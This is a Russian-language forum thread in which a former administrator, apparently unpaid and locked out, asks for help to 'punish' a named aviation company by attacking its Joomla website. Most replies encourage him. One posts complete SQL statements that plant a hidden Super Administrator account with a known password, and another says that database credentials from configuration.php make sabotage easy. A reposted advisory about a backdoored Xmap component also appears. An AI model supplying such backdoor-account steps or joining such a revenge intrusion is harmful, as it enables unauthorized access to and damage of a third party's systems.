![]() |
|
| Правила Форума редакция от 22.06.2020 |
|
|||||||
|
|
Окажите посильную поддержку, мы очень надеемся на вас. Реквизиты для переводов ниже. |
|
![]() |
|
|
Опции темы | Опции просмотра |
Language
|
|
|
|
|
Неактивный пользователь
|
Всем привет! Уважаемые товарищи, нужна помощь. Одна авиационная компания кинула меня на бабки. Сайт был написан, долгое время админился, но директор решил ничего не платить, и тупо сменил админа.
Предыстория такая: Сайт разрабатывался не мной, а заказывался у разработчиков. После чего был создан аккаунт с правами суперадмина, для его дальнейшей доработки и администрирование мной. С пол года я неспеша возился с сайтом, наполнял, админил, но руководсво решило сменить админа на бесплатного, и мне ничего не заплатило. Однажды пытаясь зайти на сайт, мне сказало, что у вас нет прав, и вообще пароль не верный. Очень хочу наказать их. сайт www.avia-soyuz.com.ua архив базы данных и всех файлов до создания моего аккаутна есть. Кто-чем может помочь? |
|
|
|
| Реклама: | прокат скатерти на свадьбу | коронку на зуб цена | Callibri Авито | Мебельный магазин: кухонный раздвижной стол купить - Переходи на сайт! | княжна анастасия теплоход круизы на 2026 год |
|
|
|
|
Неактивный пользователь
|
как решить то проблемы, скажем как закрить Datso
|
|
|
|
|
|
|
|
ViP
![]() Пол:
|
Программа: Xmap (компонент к Joomla!) 1.2.10 от 21 февраля по 23 февраля 2011 года
Опасность: Высокая Наличие эксплоита: Нет Описание: Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе. Уязвимость существует из-за распространения скомпрометированного исходного кода Xmap компонента, который содержал бекдор. Удаленный пользователь может выполнить произвольный код на целевой системе. URL производителя: joomla.vargas.co.cr/ Решение: Установите исправленную версию 1.2.10 с сайта производителя. |
|
|
|
|
|
|
|
Неактивный пользователь
|
Если есть доступ к БД, или FTP пароли то:
Выполни в БД запрос: INSERT INTO jos_users( `name`, `username`, `password`, `email`, `usertype`, `gid` ) VALUES( 'admin2', 'admin2', md5('12345'), 'admin2@mail.ru', 'Super Administrator', 25 ); INSERT INTO jos_core_acl_aro( `section_value`, `value` ) VALUES ( 'users', LAST_INSERT_ID() ); INSERT INTO jos_core_acl_groups_aro_map( `group_id`, `aro_id` ) VALUES ( 25, LAST_INSERT_ID() ); Вход в админку по логину admin2 и паролю 12345 Последний раз редактировалось zek1833; 15.05.2011 в 18:42.. Причина: Не та тема |
|
|
|
|
|
|
|||||||||||||||||||||||
Есть решение для Joomla, написал тебе в личку
|
|
|
|
|
|
Неактивный пользователь
|
Если есть доступ к БД, или FTP пароли
|
|
|
|
|
|
|
|
Если у Вас есть путь к базе SQL(даеется хостером), ee имя, логин и пароль (это из файла configuration.php) то сделать им бяку легко.
|
|
|
|
|
![]() |